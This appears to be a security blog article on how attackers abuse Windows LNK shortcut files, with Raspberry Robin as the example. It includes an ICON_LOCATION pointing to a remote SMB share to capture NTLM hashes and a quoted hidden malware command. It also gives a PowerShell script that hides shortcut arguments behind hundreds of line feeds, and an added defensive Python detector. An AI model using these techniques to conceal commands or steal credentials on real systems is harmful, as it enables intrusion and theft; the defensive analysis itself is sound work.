Using LNK files in cyberattacks

Alexander Romanov, Team Lead, Infrastructure Security, Acronis

In our daily work, we are constantly facing various attacks that can be directed at different organizations. One of these cases was the reason for an in-depth study of LNK files.

According to Microsoft’s documentation, MS-SHLLINK: Shell Link (.LNK) Binary File Format describes the format of Windows files with the extension "LNK". In this format the structure is called a shell link, or shortcut: it is a data object that contains information that can be used to access another data object.

How are these files used? They can be a shortcut to launch a browser, open a directory or launch something with additional parameters or with administrator rights.

But what is a Shell Link, and what exactly does it mean that it contains information that can be used to access another data object?

LNK file format

The LNK file format consists of four structures, but in this article, we will explore only one in detail.

· STRING_DATA refers to a set of structures that convey user interface and path identification information. The presence of these optional structures is controlled by LinkFlags (section 2.1.1) in the ShellLinkHeader (section 2.1). Its members include:

    · RELATIVE_PATH defines the location of the link target relative to the file that contains the shell link.

    · WORKING_DIR defines the file system path of the working directory to be used when activating the link target.

    · COMMAND_LINE_ARGUMENTS stores the command-line arguments specified when activating the link target.

How could LNK be abused? NTLM Information Disclosure

A malicious LNK file can be crafted to abuse a legitimate Windows feature, especially when targeting users in different VLANs, by embedding an attacker-controlled network location in the LNK file. When the user's system opens a folder containing the LNK, it unwittingly initiates an SMB connection to the specified location. In the context of segmented VLANs, this allows an attacker to potentially intercept NTLM hashes from users in various broadcast VLANs, because the LNK file triggers connections across network boundaries. The captured NTLM hashes can then be used for unauthorized access or password cracking. This highlights the importance of maintaining reliable network segmentation and implementing security measures that protect against such attacks across VLANs.

To perform this trick, you only need to set ICON_LOCATION to a server that you control. This is the easiest part, and you can find a lot of information about this type of attack.

In my example, ICON_LOCATION was \\172.27.25.70\test.ico, and whenever I opened the directory with this LNK file, Windows attempted to extract this .ico file.

LNK can serve as a vector for executing a harmful script or binary on a user's system. The LNK file can be crafted to include a reference to a script or executable file, often stored remotely or within the LNK itself. Upon executing the malicious LNK file, the system processes the instructions embedded within it, initiating the execution of the associated script or binary. This exploitation can result in the installation of malware, unauthorized system changes or the compromise of sensitive data.

APT examples

Why is this interesting? Many APT groups use LNK in the initial stages of an attack, including:

· Iranian APT Charming Kitten

· North Korean threat group ScarCruft (aka APT37)

· Raspberry Robin

I was interested in the Raspberry Robin case because in our case they hid COMMAND_LINE_ARGUMENTS — and so a user would not see exactly what this LNK did without using a hex editor.

Previous LNK files looked like the below:

But in our case, LNK looked like this:

In the above example, the target features cmd.exe. Nothing special or suspicious, right?

Hidden Commands

What is inside this file? To understand it, we need a hex editor. Important note: on Windows, most hexadecimal editors will open the target file for you, not the LNK itself. In our case, for example, you would see cmd.exe in hex.

WinHex has provided me with what I need — the hexadecimal form of the LNK file:

Now we can see that the LNK should run the following command: `cmd.exe /r type bylch.k| cmd shell32.dll`

And we can find a lot of 0A 0D. It is the hex form of:

  Character          Abbreviation   Hex
  Line feed          LF             0A
  Carriage return    CR             0D

A lot of CR and LF symbols. But where? I see that CRLF appears after the Comment and before the command line. The Comment field is not the right place for this trick, but what about the command line?

If you look at the GUI for the LNK, you can see only one field, "Target," which is the result of combining two fields.

RELATIVE_PATH and COMMAND_LINE_ARGUMENTS

Let's start with RELATIVE_PATH. The problem here is that the relative path does not support some characters (for example, carriage return), and if it contains a space or tab, RELATIVE_PATH will be framed with quotation marks.

Let's check COMMAND_LINE_ARGUMENTS, padding the arguments with line breaks and looking at the Target field in the shortcut properties:

With 200 line breaks:

With 225 line breaks:

And gotcha! Depending on how many newlines you add, our /c calc can disappear completely. At a length of 230 we achieve the magic of disappearing: the string that can be displayed to the user is simply limited in length.

"Displayed" is the important word here. You can also hide the command by using space characters, but in that case the user will be able to see all of those spaces.

The PowerShell script which you may use for testing (it builds the shortcut through the WScript.Shell COM object):

# Field values, named after the STRING_DATA members they end up in
$NAME_STRING="MaliciousShortcut"
$RELATIVE_PATH="C:\Windows\System32\cmd.exe"
# 200 line feeds placed in front of the real arguments; at 230 they are hidden completely
$newlines = "`n" * 200
$WORKING_DIR="C:\Windows\System32"
$COMMAND_LINE_ARGUMENTS="$newlines /c calc.exe"
$ICON_LOCATION="C:\Windows\System32\imageres.dll, 197"

$WshShell = New-Object -comObject WScript.Shell
$ShortcutPath = "c:\$NAME_STRING.lnk"
# Start from a clean file so no old STRING_DATA is kept
if (Test-Path $ShortcutPath) {
    Remove-Item $ShortcutPath
}
$Shortcut = $WshShell.CreateShortcut($ShortcutPath)
$Shortcut.TargetPath = $RELATIVE_PATH
$Shortcut.WorkingDirectory = $WORKING_DIR
$Shortcut.Arguments = $COMMAND_LINE_ARGUMENTS
$Shortcut.IconLocation = $ICON_LOCATION
$Shortcut.Save()

And now, you can hide any commands that you don't want to show.
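From the defender's side, the same STRING_DATA layout can be read back to spot both tricks described above (newline-padded COMMAND_LINE_ARGUMENTS and an ICON_LOCATION on a network share). The following Python is an added example, not code from the article or from Acronis: it parses the MS-SHLLINK header, skips the optional LinkTargetIDList and LinkInfo, decodes STRING_DATA and reports findings; build_lnk is a hypothetical helper that constructs a sample LNK in memory, and 192.0.2.10 is a documentation-range address, not a real host.

```python
import struct

LNK_MAGIC = bytes.fromhex("4c000000" "0114020000000000c000000000000046")  # HeaderSize + LinkCLSID
HAS_IDLIST, HAS_LINKINFO, IS_UNICODE = 0x01, 0x02, 0x80
STRING_FIELDS = [("NAME_STRING", 0x04), ("RELATIVE_PATH", 0x08), ("WORKING_DIR", 0x10),  # on-disk order
                 ("COMMAND_LINE_ARGUMENTS", 0x20), ("ICON_LOCATION", 0x40)]          # with LinkFlags bit

def parse_string_data(data: bytes) -> dict:
    """Return the STRING_DATA fields of a .LNK blob, skipping IDList and LinkInfo."""
    if data[:20] != LNK_MAGIC:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    off = 76  # ShellLinkHeader is always 0x4C bytes
    if flags & HAS_IDLIST:    # LinkTargetIDList: 2-byte IDListSize, then the items
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINKINFO:  # LinkInfo: 4-byte LinkInfoSize that counts itself
        off += struct.unpack_from("<I", data, off)[0]
    fields, width = {}, (2 if flags & IS_UNICODE else 1)
    for name, bit in STRING_FIELDS:
        if flags & bit:
            count = struct.unpack_from("<H", data, off)[0]  # CountCharacters, not bytes
            raw = data[off + 2:off + 2 + count * width]
            fields[name] = raw.decode("utf-16-le" if width == 2 else "cp1252")
            off += 2 + count * width
    return fields

def audit_lnk(data: bytes) -> list:
    """Flag the two abuses from the article: newline-padded arguments and a UNC icon."""
    fields, findings = parse_string_data(data), []
    args = fields.get("COMMAND_LINE_ARGUMENTS", "")
    if "\n" in args or "\r" in args:
        findings.append(f"arguments hidden behind {args.count(chr(10))} line breaks: {args.strip()!r}")
    icon = fields.get("ICON_LOCATION", "")
    if icon.startswith("\\\\"):
        findings.append(f"icon fetched from a network share (NTLM leak risk): {icon}")
    return findings

def build_lnk(**strings) -> bytes:
    """Hypothetical sample builder: header + Unicode STRING_DATA, no IDList or LinkInfo."""
    flags = IS_UNICODE | sum(bit for name, bit in STRING_FIELDS if name in strings)
    body = LNK_MAGIC + struct.pack("<I", flags) + bytes(52)  # remaining header fields zeroed
    for name, _ in STRING_FIELDS:
        if name in strings:
            body += struct.pack("<H", len(strings[name])) + strings[name].encode("utf-16-le")
    return body

if __name__ == "__main__":  # constructed sample; 192.0.2.10 is a documentation-range address
    sample = build_lnk(RELATIVE_PATH=r"C:\Windows\System32\cmd.exe",
                       COMMAND_LINE_ARGUMENTS="\n" * 230 + " /c calc.exe", ICON_LOCATION=r"\\192.0.2.10\test.ico")
    print("\n".join(audit_lnk(sample)) or "no findings")
```

To audit a real shortcut, pass the bytes read from the .lnk file to audit_lnk; the Target field shown by Explorer will not reveal what the parser does.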

Conclusion

As you can see, using LNK is quite popular and can be very harmful. What can you do to protect yourself?

To protect yourself from the NTLM disclosure, you can restrict NTLM authentication. Microsoft has also announced that it plans to eliminate NT LAN Manager (NTLM) in Windows 11 in the future, as it pivots to alternative authentication methods to bolster security.

When an LNK is used to run something else, the LNK file typically masquerades as a folder or as a popular file type such as a PDF. To spot it, enable the display of file extensions.

How to enable it in Windows 10:

  1. Open File Explorer. If you do not have an icon for this in the task bar, click Start, click Windows System, and then click File Explorer.
  2. Click the View tab in File Explorer.
  3. Click the box next to File name extensions to see file extensions.
  4. Click the box next to Hidden items to see hidden files.